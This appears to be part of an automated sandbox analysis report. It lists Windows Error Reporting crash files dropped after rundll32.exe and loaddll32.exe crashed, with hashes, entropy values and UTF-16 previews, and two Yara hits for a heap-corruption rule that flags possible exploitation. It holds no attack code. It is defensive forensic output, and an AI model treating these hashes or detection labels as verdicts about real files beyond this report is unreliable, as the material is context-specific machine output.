                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_14ccacb0\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12696
                                                                                                                                              Entropy (8bit):3.772807661829043
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:tLi9y0oXyRH4+V/Ojed+iIR/u7sKS274ItWcY:himXyh4+VGjec/u7sKX4ItWcY
                                                                                                                                              MD5:8A2F59A105E101E23E78ACC0218D5756
                                                                                                                                              SHA1:052FF51A4D5468E70A5B6D67D55AEE22B30CFBA3
                                                                                                                                              SHA-256:6DD953497B09FD728FE138CC13714D8854C3D5FAC254FB388FC76A5ABCF9FA25
                                                                                                                                              SHA-512:5008C69E9BE5993EF9F5FF10A83488E75DB27525CFE3BDDE3D537D3DC2230DD2F5F484C43DC61A49D6E3EDDB5315D14D0209BD6C0FC511DCB04A5786065EA182
                                                                                                                                              Malicious:false
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_14ccacb0\Report.wer, Author: Florian Roth
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.6.8.4.2.8.9.9.0.4.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.6.8.6.2.8.5.3.0.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.0.8.f.4.9.7.4.-.a.0.c.a.-.4.1.1.f.-.b.5.a.5.-.8.d.d.f.8.e.b.2.4.b.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.2.e.7.9.e.6.-.f.6.5.b.-.4.0.8.7.-.b.4.3.f.-.5.7.7.a.f.4.c.b.8.3.4.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.d.4.-.0.0.0.1.-.0.0.1.7.-.2.8.9.7.-.4.2.b.a.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_15960134\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12698
                                                                                                                                              Entropy (8bit):3.771932163227197
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:hrMeih0oXnRH4+V/Ojed+igR/u7svS274ItWci:9TiPXnh4+VGje0/u7svX4ItWci
                                                                                                                                              MD5:9A9050AF35493FDC046A0F2A5ADA6187
                                                                                                                                              SHA1:C5E499E6FDCA0794741F55ADEE04E1DC38DFEEBE
                                                                                                                                              SHA-256:5D4E9C26992329CD6F1A8B139A71AABA5517CF6C55CF9AFEFED4B9CB709D98C4
                                                                                                                                              SHA-512:33021E3E5A3AE71853E18399A5AB0ACDFE7C0D71DD41AB31E0A8B07A969BF3DB822948D1C8FF92907B1AFF2D8DAC7AA77ED0040D588A7D098EDEC66A4C14062E
                                                                                                                                              Malicious:false
                                                                                                                                              Yara Hits:
                                                                                                                                              • Rule: SUSP_WER_Critical_HeapCorruption, Description: Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_15960134\Report.wer, Author: Florian Roth
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.7.6.8.6.6.3.6.9.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.6.4.1.3.6.7.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.6.2.1.1.1.a.6.-.3.d.8.4.-.4.0.1.e.-.b.a.4.0.-.9.6.a.d.f.7.0.a.3.0.4.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.5.2.d.6.7.a.-.c.b.7.7.-.4.5.6.f.-.8.1.8.1.-.2.3.1.9.b.d.4.9.2.a.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.9.4.-.0.0.0.1.-.0.0.1.7.-.d.f.3.2.-.d.d.d.9.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_70ca6d92bb7cd6d05a398077544511f8e964d76_82810a17_101203e3\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12764
                                                                                                                                              Entropy (8bit):3.7717428493022966
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Jdg5iX0oXCHBUZMX4jed+igR/u7svS274It7cb:DyipXaBUZMX4je0/u7svX4It7cb
                                                                                                                                              MD5:1D9EFCB3DC118BEB1DEB8C569061287B
                                                                                                                                              SHA1:3BB8D01D2175D4833FF49207567C237C1DD91DF8
                                                                                                                                              SHA-256:DC410BDD1213B2F43F8E995271B9A5DEAB187DF17CDD56CCFB312F0FC6F34BEC
                                                                                                                                              SHA-512:4C793C2A5A808B3F6E2821F2F6420D37E051FE373ACEF4B8F7D8F44F814F364619D13AE33BCC25B391D9E317379A9F1D900B5596448B29971F8E5057B4BEA9F6
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.1.4.9.1.8.1.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.7.1.4.8.0.4.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.0.0.c.0.d.2.-.9.2.6.0.-.4.d.4.d.-.9.d.0.3.-.8.b.c.9.5.d.c.b.1.2.4.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.8.0.7.e.b.e.-.6.7.e.b.-.4.b.6.8.-.b.6.d.4.-.a.d.8.7.f.4.9.d.e.5.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.6.0.-.0.0.0.1.-.0.0.1.7.-.9.8.2.9.-.0.8.d.a.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_b66299609d435dc6d436af20ef404ad1f7dd29c2_82810a17_13f60d1b\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12682
                                                                                                                                              Entropy (8bit):3.768920244119495
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:RmiE0oXNL3HBUZMX4jed+igR/u7svS274ItWcG:MiyXNrBUZMX4je0/u7svX4ItWcG
                                                                                                                                              MD5:6720C3471EEE71B1241EF9B95B04D43E
                                                                                                                                              SHA1:3CF3666D7A351AD8E807367B3CFCA55CCA7B697E
                                                                                                                                              SHA-256:8378EA8DF0C1FF4F15E3312620D5B664B4AF70A23EC0C207BD6B4E99CE12FE40
                                                                                                                                              SHA-512:07BB14BF42AB7B4C70EB3D9986A4C0D71DD663A8E3AE2D9A0B9DB59E3A84941888DC6B6F48C019F86B92F6AE6B6010C53484944D52A2AC0ED9130E135C30EE6E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.6.8.5.1.1.7.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.9.2.1.0.5.4.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.6.0.a.f.8.8.7.-.c.7.4.1.-.4.a.b.6.-.9.1.d.9.-.d.6.e.3.9.a.6.a.4.a.0.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.c.b.1.5.9.9.-.b.3.9.4.-.4.7.8.8.-.8.8.b.7.-.4.2.0.5.6.a.4.4.1.1.5.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.0.4.-.0.0.0.1.-.0.0.1.7.-.9.0.c.4.-.6.7.d.a.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_fd713208f5835c7ef2b9edc915523e535d24f6_82810a17_06420ae8\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12682
                                                                                                                                              Entropy (8bit):3.7686287414091635
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:9Ai4Oin0oXGVxHBUZMX4jed+igR/u7svS274ItWcW:1iZXGTBUZMX4jeU/u7svX4ItWcW
                                                                                                                                              MD5:D5A543FCF617A53047391FA79B6BB0D2
                                                                                                                                              SHA1:C5C806E1DE4F14A0234405E7A168AF03C1C5E61B
                                                                                                                                              SHA-256:CBEFF017D5A0096CAE4F8837BE31AE35B840BB6FAFED61AC991DAD5A68E31CD8
                                                                                                                                              SHA-512:CDCD70619E510CBC5A454AB9A738D7F2FC85D1E6FFC6F1D8E7633E13FE07BE9FD2EC1056337DC1BF8E18132EA8A8EAC6A4636A1E14A7A5E6A85AC461FD04FCFA
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.6.7.4.1.7.9.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.7.7.8.8.9.8.0.4.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.2.2.4.6.8.e.-.a.4.4.7.-.4.2.b.9.-.9.3.0.f.-.d.0.5.3.4.9.7.f.8.5.a.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.3.f.7.2.6.5.6.-.7.0.f.8.-.4.e.c.c.-.a.a.b.9.-.7.5.c.3.1.4.4.6.c.8.a.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.2.0.-.0.0.0.1.-.0.0.1.7.-.a.a.6.d.-.4.2.d.a.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_97ddcb6e334012c795b269b0febf6434961ab49_160cf2be_07f693b0\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):10086
                                                                                                                                              Entropy (8bit):3.7648879788229883
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:t6AXy+y9hAtFaM056tpXIQcQ6c6n+hcEZcw3P+a+z+HbHgzFpAoXOgtYsASonj+K:WWFHUb+hjbjG7g/u7svS274Itb2u
                                                                                                                                              MD5:794F5EE3AFD496B22C5AE33B871528AF
                                                                                                                                              SHA1:FA78FB2D08774AB9E94786FA64B44BD346CAE91B
                                                                                                                                              SHA-256:459F9CDC01C84A7BDB1406D46A1FA41434BC1CAC9DB4F1DE3D7F6B34884162FC
                                                                                                                                              SHA-512:A6F5BA64E7BAA2A0ED44E1EA999825792BB7FE871AE50D3515983EF65977D0B5A34878D9C0375A2423C3C1F4C2B9761C9C104B566CDD69D44D32492F764A5BF1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.8.1.4.3.6.6.7.1.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.5.c.c.6.8.e.0.-.c.3.3.1.-.4.7.0.0.-.9.f.b.1.-.8.b.9.f.2.8.1.a.1.2.4.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.7.a.f.b.b.b.-.2.b.1.a.-.4.6.8.6.-.9.c.7.9.-.b.a.6.f.8.5.d.3.f.e.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.7.0.-.0.0.0.1.-.0.0.1.7.-.9.a.8.c.-.e.1.b.9.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.4././.0.4.:.1.0.:.5.0.:.5.4.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_a6e5673309e41777fbcceb355472075a2d98e3b_82810a17_16e8b22e\Report.wer
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):12860
                                                                                                                                              Entropy (8bit):3.7599037631496284
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:1i5iE0oXKFHVzOMjed+iYs/u7sKS274It7cT:1i5iyXgVzOMjeB/u7sKX4It7cT
                                                                                                                                              MD5:98ABE178E3ABF9EB668F1B1D5872DE2A
                                                                                                                                              SHA1:100975FCBAD81CF2E578A2D2BCE83BC1327AE577
                                                                                                                                              SHA-256:0E5408D503280B4982C256B7497E8CB1A5415B5C46949BB71A042B1AECD76C0E
                                                                                                                                              SHA-512:26FDC68583DBE7881E2E095C5AC3A892EDC321AD3B725BEF2AA383E6D0FD92E72751C19E2BE11F94C8B9D4C6FB81944A0214C7FDA0CDFB3AA791F6DAD8576090
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.6.9.0.3.3.5.7.5.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.b.7.c.8.7.9.7.-.1.f.b.0.-.4.c.c.b.-.b.f.c.4.-.4.9.2.8.a.9.5.b.7.5.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.5.b.9.6.e.4.-.3.3.b.6.-.4.c.7.b.-.9.1.6.7.-.7.f.d.6.c.9.f.a.a.0.6.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.0.8.-.0.0.0.1.-.0.0.1.7.-.0.7.f.b.-.3.e.b.a.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3A6.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8314
                                                                                                                                              Entropy (8bit):3.6969170915314
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNiU069B6YRv61TNgmfT3GS0CprD89bJfsfESjm:RrlsNi/6r6Y561TNgmfTWSIJEfi
                                                                                                                                              MD5:83EE80F83555E155D4E6F8C290163C83
                                                                                                                                              SHA1:8F75252ADC162668763265392AE51313FE4444FC
                                                                                                                                              SHA-256:DA12AA73FD5E4B489EE69F761BAEBB82018DD77F52221C5A7444DCE2BB08CD01
                                                                                                                                              SHA-512:A66B60130741AE37FD38EE5DB251280810FD213533E6A1777415ED94D7CFC0C940333DCE633C7C05CF878494F1DDDC35049745AFBF80038A659606FC63E0882E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.0.8.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER4AF.tmp.WERInternalMetadata.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8314
                                                                                                                                              Entropy (8bit):3.6964706101291984
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:Rrl7r3GLNifn69l6YRVE61TNgmfT3sS0CprJ89bJ8sf6jm:RrlsNif6v6YjE61TNgmfT8SqJPfX
                                                                                                                                              MD5:BCF747BF3D53D1B5A8D14F8F57A0AD2A
                                                                                                                                              SHA1:FE6AC825C5A7292A9C99B022B165ABFCC50EEC67
                                                                                                                                              SHA-256:697F166ECB868306B2457071EF2A8C15B824BC9B82F91E3C07249027155D92C0
                                                                                                                                              SHA-512:2AA1D7214ACE2C84686C00A226AF6DF7B487EBFD08437168D9DEC4CF662EA6EF269C28926333A4ACC722C0A7489A0048DE5806C1F8F3B296D9ED1984E0E04435
                                                                                                                                              Malicious:false
                                                                                                                                              Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.6.8.<./.P.i.d.>.......
                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER53D.tmp.xml
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4665
                                                                                                                                              Entropy (8bit):4.476151288026438
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwSD8zswJgtWI9CMWSC8Beb8fm8M4JCdstN4xFN+q8/YNGnpV4SrSO6d:uITf25lSNzJfN4JPNGvDWHd
                                                                                                                                              MD5:722D834E41F5EEA7B44C740205A252F7
                                                                                                                                              SHA1:229BE92DE4D92FD57739277B655916D31F3F707D
                                                                                                                                              SHA-256:4C75EF43840CDC5ADB9E0AD416D0589C463B99F3B8C39EFE3B4C244739458E7E
                                                                                                                                              SHA-512:15A566D833F99DD589996AFE8C5C029118F3EDE61B56526FF1F6C5617ED4613995EBE4693B9CE9D19F67644BF7E3F1D6860956088F4FAEC144BCECEA514655AC
                                                                                                                                              Malicious:false
